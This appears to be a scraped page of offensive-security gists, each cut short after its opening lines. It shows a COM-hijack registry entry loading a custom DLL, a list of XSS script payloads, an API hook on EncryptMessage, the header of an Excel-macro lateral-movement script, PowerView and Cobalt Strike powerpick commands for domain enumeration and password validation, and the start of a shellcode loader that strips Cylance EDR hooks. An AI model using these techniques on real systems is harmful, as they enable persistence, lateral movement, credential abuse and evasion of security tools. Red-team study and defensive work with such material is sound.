This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Windows Registry Editor Version 5.00 | |
[HKEY_CURRENT_USER\Software\Classes\CLSID\{97d47d56-3777-49fb-8e8f-90d7e30e1a1e}] | |
[HKEY_CURRENT_USER\Software\Classes\CLSID\{97d47d56-3777-49fb-8e8f-90d7e30e1a1e}\InProcServer32] | |
@="C:\\Users\\Administrator\\Documents\\Visual Studio 2015\\Projects\\ClassLibrary2\\ClassLibrary2\\bin\\x86\\Debug\\ClassLibrary2.dll" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
''"> | |
”><script>alert(“X”)</script> | |
’><script>alert(1)</script> | |
"><script>alert(1)</script> | |
'><script>alert(1)</script> | |
' '><script>alert(1)</script> | |
"><script>alert(1)</script> | |
'><script>alert(1)</script> | |
<script>alert(1)</script> | |
"><script>alert(1)</script> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Constant for HKEY_LOCAL_MACHINE... | |
var HKCR = 0x80000000; | |
/* | |
Const HKCR = &H80000000 'HKEY_CLASSES_ROOT | |
Const HKCU = &H80000001 'HKEY_CURRENT_USER | |
Const HKLM = &H80000002 'HKEY_LOCAL_MACHINE | |
Const HKU = &H80000003 'HKEY_USERS | |
Const HKCC = &H80000005 'HKEY_CURRENT_CONFIG | |
*/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# | |
# NB : this is not secure | |
# from http://code.activestate.com/recipes/266586-simple-xor-keyword-encryption/ | |
# added base64 encoding for simple querystring :) | |
# | |
def xor_crypt_string(data, key='awesomepassword', encode=False, decode=False): | |
from itertools import izip, cycle | |
import base64 | |
if decode: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#define SECURITY_WIN32 //Define First Before Imports. | |
#include <windows.h> | |
#include <stdio.h> | |
#include <Sspi.h> //Be sure to reference secur32.lib in Linker | Input | Additional Dependencies | |
FARPROC fpEncryptMessage; //Pointer To The Original Location | |
BYTE bSavedByte; //Saved Byte Overwritten by 0xCC - |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Invoke-ExcelMacroPivot{ | |
<# | |
.AUTHOR | |
Matt Nelson (@enigma0x3) | |
.SYNOPSIS | |
Pivots to a remote host by using an Excel macro and Excel's COM object | |
.PARAMETER Target | |
Remote host to pivot to | |
.PARAMETER RemoteDocumentPath | |
Local path on the remote host where the payload resides |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# get all the groups a user is effectively a member of, 'recursing up' using tokenGroups | |
Get-DomainGroup -MemberIdentity <User/Group> | |
# get all the effective members of a group, 'recursing down' | |
Get-DomainGroupMember -Identity "Domain Admins" -Recurse | |
# use an alterate creadential for any function | |
$SecPassword = ConvertTo-SecureString 'BurgerBurgerBurger!' -AsPlainText -Force; $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword); Get-DomainUser -Credential $Cred | |
# retrieve all the computer dns host names a GPP password applies to |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Hunting files on domain controllers: | |
powerpick gci -path \\<DC-hostname>\SYSVOL\<fqdn>\ -Recurse | ? {$_.name -match ".vbs"} | |
powerpick gci -path \\<DC-hostname>\SYSVOL\<fqdn>\ -Recurse | ? {$_.name -match ".exe"} | |
# Validating password | |
powerpick Add-Type -AssemblyName System.DirectoryServices.AccountManagement;$contextType = [System.DirectoryServices.AccountManagement.ContextType]::Domain;$principalContext = New-Object System.DirectoryServices.AccountManagement.PrincipalContext($contextType, '<DC-hostname>');$principalContext.ValidateCredentials('<username>', '<password>') | |
# Curated output for listing processes (WMI) | |
powerpick $Password = ConvertTo-SecureString "<password>" -asplaintext -force; $Credential = New-Object -Typename System.Management.Automation.PSCredential -ArgumentList "<DOMAIN\username>",$Password;Get-WMIObject Win32_Process -computername <target-hostname> -Credential $Credential| ?{$_.GetOwner().User -NotLike 'SYSTEM' -and $_.GetOwner().User -NotLike "*SERVICE"} | select ProcessID,Name,@{n |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <iostream> | |
#include <windows.h> | |
unsigned char buf[] = | |
"SHELLCODE_GOES_HERE"; | |
struct syscall_table { | |
int osVersion; | |
}; | |
// Remove Cylance hook from DLL export | |
void removeCylanceHook(const char *dll, const char *apiName, char code) { | |
DWORD old, newOld; |